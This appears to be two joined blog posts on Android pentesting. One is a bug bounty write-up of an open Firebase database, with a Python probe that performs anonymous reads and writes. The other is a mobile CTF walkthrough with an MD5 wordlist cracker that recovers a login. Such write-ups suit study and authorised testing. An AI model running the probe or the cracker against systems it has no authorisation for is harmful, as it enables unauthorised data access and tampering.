
How I was able to find firebase database takeover vulnerability in a company

Introduction

This is my bug bounty write-up about a Firebase database takeover vulnerability that I found in an Android app. There are only a few resources about Android hacking, so this article aims to briefly document one class of Android vulnerability, the Firebase database takeover, by sharing my finding. The root cause is a Firebase Realtime Database whose security rules allow anyone to read and write without authenticating, and the database URL ships inside the app's resources. I will blur some of the company information. That being said, let's jump in.

Steps To Reproduce

1. Download the application from the Google Play Store.

2. Use an APK extractor to extract the APK.

3. Install it in an emulator (I used BlueStacks).

4. Use apktool to decompile the application.

5. Go to res/values/strings.xml.

6. Look for the Firebase database URL (the firebase_database_url string, an address of the form https://<project>.firebaseio.com).

7. I wrote a Python script to insert data into the database through its REST endpoint.

8. POC (Proof of Concept)
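The script below is an added example of what step 7 does, not the author's own script. It talks to the Firebase Realtime Database REST API (each path is addressed as <db_url>/<path>.json, and a token would be passed as ?auth=...), checks whether an anonymous client can read the root and write a marker node, and removes the marker afterwards. The database URL is a placeholder, the marker path pentest_marker is an arbitrary choice, and the send argument exists so the probe logic can be exercised without network access.

```python
"""Probe a Firebase Realtime Database for unauthenticated read/write access.

Added example: DB_URL is a placeholder, not the target from the write-up.
"""
import json
import urllib.error
import urllib.parse
import urllib.request

# Placeholder; in the real finding this came from res/values/strings.xml.
DB_URL = "https://example-app.firebaseio.com"
# Arbitrary, self-identifying key so the write test is easy to clean up.
TEST_PATH = "pentest_marker"


def rest_url(db_url, path="", **params):
    """Build a Realtime Database REST URL: <db>/<path>.json?<params>."""
    url = f"{db_url.rstrip('/')}/{path.strip('/')}.json"
    if params:
        url += "?" + urllib.parse.urlencode(params)
    return url


def http_send(method, url, body=None):
    """Real transport: (status_code, decoded JSON body or None)."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(
        url, data=data, method=method,
        headers={"Content-Type": "application/json"},
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, json.loads(resp.read() or b"null")
    except urllib.error.HTTPError as err:
        try:
            payload = json.loads(err.read() or b"null")
        except ValueError:
            payload = None
        # A locked database answers 401 {"error": "Permission denied"}.
        return err.code, payload


def probe(db_url, send=http_send):
    """Report what an anonymous client can do against the database.

    Returns {"read": bool, "write": bool}. Both True means the rules are
    wide open: no auth token is required to read or modify data.
    """
    findings = {"read": False, "write": False}

    # 1. Anonymous read of the root. shallow=true returns only the
    #    top-level keys, so this stays small on large databases.
    status, _ = send("GET", rest_url(db_url, shallow="true"))
    findings["read"] = status == 200

    # 2. Anonymous write: PUT a harmless marker under our own key.
    marker = {"note": "authorized security test"}
    status, _ = send("PUT", rest_url(db_url, TEST_PATH), marker)
    if status == 200:
        findings["write"] = True
        # 3. Clean up so the test leaves no data behind.
        send("DELETE", rest_url(db_url, TEST_PATH))

    return findings


if __name__ == "__main__":
    print(probe(DB_URL))
```

Run it only against a database you are authorized to test; the marker write is the proof of concept for "anyone can insert data", and the DELETE afterwards keeps the test non-destructive.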

Impact

The database does not require any access token to insert data: its security rules are completely open, so anyone who knows the URL can read and write it without credentials.

Timeline

Vulnerability Reported – 15 October, 2020 3:37 AM.

Replied – 15 October, 2020 12:31 PM

Rewarded $100 for two reports – 21 October, 2020 11:21 AM.

Conclusion

I really appreciate the company's very fast reply when I submitted the vulnerability, and that they allowed me to disclose it. I really enjoyed finding bugs in their organization, and I thank them for agreeing to disclose this report and rewarding me with a bounty.

References

https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1

Infosec Mobile CTF Challenge 1

Introduction

Hello, I am Chan. Today I want to write an article about an Android CTF challenge from Infosec Mobile CTF 2018. While learning Android pentesting I noticed that there are few resources about it, so I want to write more articles on Android pentesting and share my knowledge with the community.

That being said, this article aims to briefly document some techniques and tools involved in the vulnerability assessment of Android applications. For this purpose, we will solve the 1st challenge of the Infosec Mobile CTF and learn mobile pentesting through CTF challenges. Please get the APK from here.

Initial Setup

I am going to use the BlueStacks emulator to solve this challenge. I have already set up the emulator, so I just click on the APK and it installs automatically.

Challenge Description

App CTF Challenge 1: The goal behind this challenge is to figure out the username and password that would let the challenger login successfully. The flag should be “password:username”. (ends 4/6)

1. Decompile The Apk

I will use apktool to decompile the APK (this unpacks the resources and produces smali for the Dalvik bytecode).

apktool d App1.apk

2. Launch the apk in emulator

3. Convert the APK to a jar file to analyze the source code

I used dex2jar, which converts the classes.dex inside the APK into a jar that a Java decompiler can read.

4. Get the following files

5. Use jd-gui to view the source code of the jar file

We can see that com.ctf.app1 is the package of the APK and that there is nothing interesting in BuildConfig.class.

It is pretty obvious that this is an MD5 hashing function. Note that MD5 is a one-way hash, not encryption, so the value it produces cannot be decrypted; it can only be looked up or brute-forced.

Having seen the MD5 function above, we can now see an MD5 string and a function called onClick.

The onClick handler takes the username and password entered by the user, concatenates them into one string, hashes that string with MD5 and compares the digest to 263c7fa932b26a56ec0ad76b94aff98b.

6. Recovering the plaintext for the MD5 hash

I used the website https://hashes.com/en/decrypt/hash to look up the MD5 hash in its precomputed tables.
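As an added example (not code from the challenge or from the write-up), the script below re-implements the onClick check in Python and does the lookup offline: it tries every username/password pair from a small wordlist, in both concatenation orders since the decompiled code only tells us the two values are joined, and reports the first pair whose MD5 digest matches. TARGET is the digest shown in the write-up; the wordlists are constructed for illustration and do not contain the real answer, which the hash-lookup site supplies.

```python
"""Offline equivalent of the hash-lookup step for the challenge login.

Added example; the challenge's own Java is not reproduced here.
"""
import hashlib

# Digest the app compares against in onClick (from the decompiled code).
TARGET = "263c7fa932b26a56ec0ad76b94aff98b"

# Constructed wordlists for demonstration; not the challenge's real values.
USERNAMES = ["admin", "user", "test", "root"]
PASSWORDS = ["password", "admin", "123456", "letmein"]


def login_digest(username, password):
    """Mirror the app's check: lower-case hex MD5 of username + password."""
    return hashlib.md5((username + password).encode()).hexdigest()


def crack(target, usernames, passwords):
    """Return (username, password) whose MD5 matches target, else None.

    Both concatenation orders are tried because the decompiled onClick
    only shows that the two inputs are joined before hashing.
    """
    target = target.lower()
    for user in usernames:
        for pwd in passwords:
            if login_digest(user, pwd) == target:        # username + password
                return user, pwd
            if login_digest(pwd, user) == target:        # password + username
                return user, pwd
    return None


def flag_for(username, password):
    """Format the answer the way the challenge wants it: password:username."""
    return f"{password}:{username}"


if __name__ == "__main__":
    hit = crack(TARGET, USERNAMES, PASSWORDS)
    print("no match in wordlist" if hit is None else flag_for(*hit))
```

The same check scales to a real wordlist such as rockyou by reading the password candidates from a file instead of the inline list; MD5 with no salt and no iteration count is cheap enough that millions of candidates run in seconds.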

7. Flag

As mentioned in the challenge description, the flag is made up of the username and password.

Username - admin
Password - [email protected]

8. POC(Proof Of Concept)

After submitting the username and password, we get the smiley face :)

Conclusion

This is my first article about Android pentesting. If you would like to learn more about Android pentest challenges, please keep reading my blog. I will post more Android pentest challenges and their solutions, as this is going to be a series on learning Android pentesting through CTF challenges.

If you like this article, please share on your social media and share to your friends.

Keep learning.

Thank you!
